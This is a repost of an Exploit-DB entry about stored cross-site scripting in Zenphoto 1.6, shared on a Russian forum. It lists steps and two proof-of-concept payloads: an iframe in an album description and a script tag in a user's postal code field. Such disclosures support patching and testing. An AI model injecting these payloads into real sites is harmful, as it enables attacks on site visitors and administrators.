Zenphoto 1.6 - Multiple stored XSS | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Июл 2024

EDB-ID: 51485

Проверка EDB

Пройдено

Автор: MIRABBAS AğALAROV

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-N/A

Дата публикации: 2023-05-25

Zenphoto 1.6 - Multiple stored XSS

Код:

Exploit Title: Zenphoto 1.6 - Multiple stored XSS
Application: Zenphoto-1.6 xss poc
Version: 1.6 
Bugs:  XSS
Technology: PHP
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
###XSS-1###
steps: 
1. create new album 
2. write Album Description : <iframe src="https://14.rs"></iframe> 
3. save and view album  http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/

=====================================================
###XSS-2###
steps: 
1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
2.change postal code  as <script>alert(4)</script>
3.if admin user information import as html , xss will trigger

poc video : https://youtu.be/JKdC980ZbLY

Источник: www.exploit-db.com

Поиск

Exploit Zenphoto 1.6 - Multiple stored XSS

Exploiter

Похожие темы